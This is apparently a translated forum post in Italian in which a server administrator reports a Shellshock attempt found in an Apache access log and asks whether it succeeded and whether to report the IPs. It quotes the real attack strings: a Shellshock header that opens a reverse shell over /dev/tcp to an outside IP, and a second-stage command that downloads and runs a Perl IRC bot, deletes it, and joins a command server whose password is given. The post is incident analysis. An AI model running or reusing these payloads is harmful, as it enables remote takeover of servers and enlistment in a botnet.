Oggi ho sfruttato l'access.log di Apache per la famigerata stringa () {
, e oltre a un mucchio di ciò che sembrava un ping per verificare quanti server sono vulnerabili, ho trovato questo tentativo, che sembrava un vero attacco:
94.23.193.131 - - [26/Sep/2014:05:48:53 +0200] "GET / HTTP/1.0" 200 29271 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
Quello che ho fatto dopo è stato vedere cosa ha fatto quella connessione TCP; Ho cercato il risultato:
user@localhost:~# cat < /dev/tcp/195.225.34.101/3333
cat < /dev/tcp/195.225.34.101/3333
wget -O /tmp/.lCE-unix http://202.137.176.146/icons/xt.dat;perl /tmp/.lCE-unix 81.18.135.38 443;rm -rf /tmp/.lCE-unix;uptime
Se lo sto leggendo bene, imposterà uno script Perl ospitato su http://202.137.176.146/icons/xt.dat
( Copia dello script su Pastebin ), lo stampa su /tmp/.lCE-unix, lo esegue, quindi si rimuove da solo.
Guardando lo script stesso, quello che penso stia vedendo è che tenta di connettersi a un server IRC su IP 81.18.135.38, porta 443, usando una password di connessione 45QOhktzhwR4Ai, utente 'opus', quindi prova ad unirsi canale '## n3' (se ho ragione).
Devo ammettere che volevo solo condividerlo da qualche parte. Domande reali però:
- L'attacco è stato gestito da Apache, che probabilmente ha inoltrato la richiesta a Wordpress ospitata su /, una versione 3.x. Non penso che sia mai stato eseguito da Bash, ma qualcuno può confermarlo?
- Come posso verificare se l'attacco ha avuto successo? Ho eseguito comandi come netstat e lsof ma non sono riuscito a trovare nessuna delle connessioni ordinarie oltre alla mia sessione SSH, al server Web, ecc. Nessuna connessione a nessuno degli indirizzi IP dati, nessun processo Perl in esecuzione.
- È un exploit conosciuto? Non ho trovato molto in una ricerca, anche se c'è un thread sulla mailing list di Redhat del 2005 che sembra fare riferimento al file.
- Devo segnalare alcuni di questi indirizzi IP alle autorità? E se sì, quale? Posso immaginare l'FBI e chi non vorrebbe abbattere il server C & C a cui si fa riferimento.